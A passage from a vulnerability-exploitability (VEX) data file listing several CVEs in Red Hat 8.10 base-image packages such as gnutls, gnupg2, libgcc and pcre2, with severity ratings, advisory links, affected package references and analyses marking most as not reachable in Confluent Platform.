          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1306"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220915-0005/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5550-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5750-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-4209"
        }
      ],
      "published": "2022-08-24T16:15:09+00:00",
      "updated": "2026-06-17T04:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2022-27943",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-27943"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-27943"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead"
        },
        {
          "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
        }
      ],
      "published": "2022-03-26T13:15:07+00:00",
      "updated": "2026-06-17T04:37:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-3219",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-3219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-3219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010"
        },
        {
          "url": "https://dev.gnupg.org/D556"
        },
        {
          "url": "https://dev.gnupg.org/T5993"
        },
        {
          "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230324-0001/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
        }
      ],
      "published": "2023-02-23T20:15:12+00:00",
      "updated": "2026-06-17T04:59:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-41409",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-41409"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-41409"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/issues/141"
        },
        {
          "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
        }
      ],
      "published": "2023-07-18T14:15:12+00:00",
      "updated": "2026-06-17T05:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "10.32-3.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-4899",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
